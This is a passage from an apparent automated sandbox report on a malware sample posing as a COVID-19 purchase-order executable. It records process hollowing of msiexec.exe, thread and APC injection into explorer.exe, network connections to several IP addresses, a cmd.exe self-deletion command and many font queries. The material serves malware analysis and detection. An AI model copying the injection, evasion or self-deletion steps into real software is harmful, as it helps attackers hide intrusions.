          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04589100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0458B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_046051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0463B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0463B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04658A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04589240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0464EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04614257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04585210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04585210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0458AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0458AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_04598A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_045C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 154.92.73.140 80
          Source: C:\Windows\explorer.exeNetwork Connect: 165.160.13.20 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 104.24.109.70 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeMemory written: C:\Users\user\Desktop\Po-covid19 2372#w2..exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeThread register set: target process: 3388
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: BF0000
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeProcess created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
          Source: explorer.exe, 00000004.00000002.616589320.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
          Source: explorer.exe, 00000004.00000000.256011429.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.276172975.000000000871F000.00000004.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.256011429.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.256011429.0000000001980000.00000002.00000001.sdmp, msiexec.exe, 0000000E.00000002.617812002.0000000002E10000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Users\user\Desktop\Po-covid19 2372#w2..exe VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
